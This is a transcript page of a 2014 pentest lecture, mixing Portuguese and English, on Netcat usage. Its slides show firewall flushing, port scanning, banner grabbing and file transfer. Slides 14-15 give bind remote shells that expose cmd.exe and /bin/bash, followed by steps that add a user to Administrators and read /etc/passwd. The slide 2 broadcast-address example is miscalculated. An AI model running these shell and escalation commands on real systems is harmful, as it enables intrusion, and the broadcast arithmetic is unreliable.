Presentation is loading. Please wait.

Presentation is loading. Please wait.

Pentest com script shell & Perl Cerutti – IESGF - 2014.

Published byMelissa Bertrand Modified over 9 years ago

Similar presentations

Presentation on theme: "Pentest com script shell & Perl Cerutti – IESGF - 2014."— Presentation transcript:

1 Pentest com script shell & Perl Cerutti – IESGF - 2014

2 Ping broadcast Veja a mascara da sura rede. O IP de broadcast é o que tem, segundo a máscara, todos os bits de host=1. Por exemplo: – Meu IP na rede é 10.1.1.30 – A mascara é 255.255.255.192 – O end de broadcast será 10.1.1.33

3 root# ping 192.168.0.255 PING 192.168.0.255 (192.168.0.255): 56 data bytes 64 bytes from 192.168.0.150: icmp_seq=0 ttl=64 time=0.063 ms 64 bytes from 192.168.0.165: icmp_seq=0 ttl=64 time=30.095 ms 64 bytes from 192.168.0.150: icmp_seq=1 ttl=64 time=0.117 ms 64 bytes from 192.168.0.165: icmp_seq=1 ttl=64 time=17.263 ms

4 Netcat According to SecTools.org, Netcat is ranked as the eighth favorite network security tool (Nmap Security Scanner Project, 2011

5 http://packetstormsecurity.org/files/downloa d/14051/nc110.tgz http://packetstormsecurity.org/files/downloa d/14051/nc110.tgz sudo apt-get install netcat-traditional

6 Desativar firewall Iptables -F

7 Chat interface

8 Hypervisors

9 Conectar porta conectar porta alta qualquer, por exemplo portaTCP 1234 $ nc -l 1234 nc is now listening on port 1234 for a connection. On a second console (or a second machine), connect to the machine and port being listened on: $ nc 127.0.0.1 1234

10 chat

11 transferindo dados com Netcat –vv (double v) for additional verbosity that will give you the number of bytes transferred during a file transfer. The –w switch instructs Netcat to wait for a specific number of seconds before timing out the connection. In our example, we specify 30 seconds

12 Transferencia no MAC-OSX nc -v -w 30 -p 1234 –l > secret.txt Start by using nc to listen on a specific port, with output captured into a file: $ nc -l 1234 > filename.out Using a second machine, connect to the listening nc process, feeding it the file which is to be trans- ferred: $ nc host.example.com 1234 < filename.in After the file has been transferred, the connection will close automatically.

13 banner grabbing with Netcat

14 Windows remote shell (and simple post-exploitation hi-jinks) Preparing the listener nc –Lp 31337 –vv –e cmd.exe Connecting to the target nc 192.168.0.10 31337 – Dir c:/ – Md /invasao – net localgroup Administrators bob

15 Linux shell sudo nc –lp 31337 –e /bin/bash Connecting to the target As I have demonstrated in the previous exercise, you simply connect to the host (as shown below) and the port that you want to connect to, and the listener will serve up the bash shell for you as follows: nc 192.168.0.11 31337 grep bob /etc/passwd

16 Abrindo paginas web no servidor $ echo -n "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80

17 Enviando email $ nc localhost 25 << EOF HELO host.example.com MAIL FROM: RCPT TO: DATA Body of email.. QUIT EOF

18 Varredura de portas $ nc -z host.example.com 20-30 Connection to host.example.com 22 port [tcp/ssh] succeeded! Connection to host.example.com 25 port [tcp/smtp] succeeded! The port range was specified to limit the search to ports 20 - 30.

19 which server software is running, and which versions. o first make a connection, and then break the connection when the banner has been retrieved. This can be accomplished by specifying a small timeout with the -w flag, or perhaps by issuing a "QUIT" command to the server: $ echo "QUIT" | nc host.example.com 20-30 SSH-1.99-OpenSSH_3.6.1p2 Protocol mismatch. 220 host.example.com IMS SMTP Receiver Version 0.84 Ready

20 Open a TCP connection to port 42 of host.example.com using 10.1.2.3 as the IP for the local end of the connection: $ nc -s 10.1.2.3 host.example.com 42 Create and listen on a Unix Domain Socket: $ nc -lU /var/tmp/dsocket Connect to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080. This example could also be used by ssh(1); see the ProxyCommand directive in ssh_config(5) for more information. $ nc -x10.2.3.4:8080 -Xconnect host.example.com 42

21 Scanning a range of devices with a script for i in {10..12}; do nc –vv –n –w 1 192.168.0.$i 21-25 –z; done

22 Official sites Unix Netcat Homepage: http://nc110.sourceforge.net/ http://nc110.sourceforge.net/ GNU Netcat Project: http://netcat.sourceforge.net/ http://netcat.sourceforge.net/ Ncat – The Nmap Project: http://www.nmap.org/ncat

23 Articles and tutorials Offensive Security explains how to create a persistent back door using Netcat and Metasploit's Meterpreter: http://www.offensive-security.com/metasploit-unleashed/Persistent_ Netcat_Backdoor Crazy Netcat Relays for Fun and Profit: http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy- Ass_Netcat_Relays_for_Fun_and_Profit SANS Institute Netcat Pocket Cheatsheet: http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_ v1.pdf Some interesting use cases not covered in this book by Johannes Franken: http://www.jfranken.de/homepages/johannes/vortraege/netcat.en.html A great reference for using Netcat for debugging SOAP and XML web services using Netcat: http://parand.com/say/index.php/2005/03/11/simple-recipe-fordebugging- web-services/

24 Twitter Follow Thomas Wilhelm on Twitter: https://twitter.com/#!/thomas_wilhelm Follow Brian Baskin on Twitter: https://twitter.com/#!/bbaskin Follow Michael Scherer on Twitter: https://twitter.com/#!/theprez98 Follow Ed Skoudis on Twitter: https://twitter.com/#!/edskoudis For more Open Source information, follow Packt at: http://twitter.com/#!/packtopensource

Download ppt "Pentest com script shell & Perl Cerutti – IESGF - 2014."

Similar presentations

COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard.

COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
FIRST SESSION - XAMPP Jeongmin Lee.  Jeongmin Lee  CS  PHD  Machine Learning, AI  Web System Development.

FIRST SESSION - XAMPP Jeongmin Lee.  Jeongmin Lee  CS  PHD  Machine Learning, AI  Web System Development.
Wireless Networking. Wireless Standards 802.11a 802.11b 802.11g 802.11n.

Wireless Networking. Wireless Standards a b g n.
Overview The TCP/IP Stack. The Link Layer (L2). The Network Layer (L3). The Transport Layer (L4). Port scanning & OS/App detection techniques. Evasion.

Overview The TCP/IP Stack. The Link Layer (L2). The Network Layer (L3). The Transport Layer (L4). Port scanning & OS/App detection techniques. Evasion.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions April 14, 2015 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions April 14, 2015 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.

Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Network Mapping  Identify Live Hosts  Determine running Services TCP Port Scanning UDP Port Scanning Banner Grabbing ARP Discovery  Identify Perimeter.

Network Mapping  Identify Live Hosts  Determine running Services TCP Port Scanning UDP Port Scanning Banner Grabbing ARP Discovery  Identify Perimeter.
Nmap Experiment.

Nmap Experiment.
Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.

Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.
Hacking Exposed 7 Network Security Secrets & Solutions Chapter 2 Scanning 1.

Hacking Exposed 7 Network Security Secrets & Solutions Chapter 2 Scanning 1.
System Security Scanning and Discovery Chapter 14.

System Security Scanning and Discovery Chapter 14.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Network Security Testing Techniques Presented By:- Sachin Vador.

Network Security Testing Techniques Presented By:- Sachin Vador.
Assessing Vulnerabilities ISA 4220 Server Systems Security James A. Edge Jr., CISSP, CISM, CISA, CPTE, MCSE Sr. Security Analyst Cincinnati Bell Technology.

Assessing Vulnerabilities ISA 4220 Server Systems Security James A. Edge Jr., CISSP, CISM, CISA, CPTE, MCSE Sr. Security Analyst Cincinnati Bell Technology.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
TCP/IP Tools Lesson 5. Objectives Skills/ConceptsObjective Domain Description Objective Domain Number Using basic TCP/IP commands Understanding TCP/IP3.6.

TCP/IP Tools Lesson 5. Objectives Skills/ConceptsObjective Domain Description Objective Domain Number Using basic TCP/IP commands Understanding TCP/IP3.6.
MIS 5211.001 Week 7 Site:

MIS Week 7 Site:

Similar presentations

Ads by Google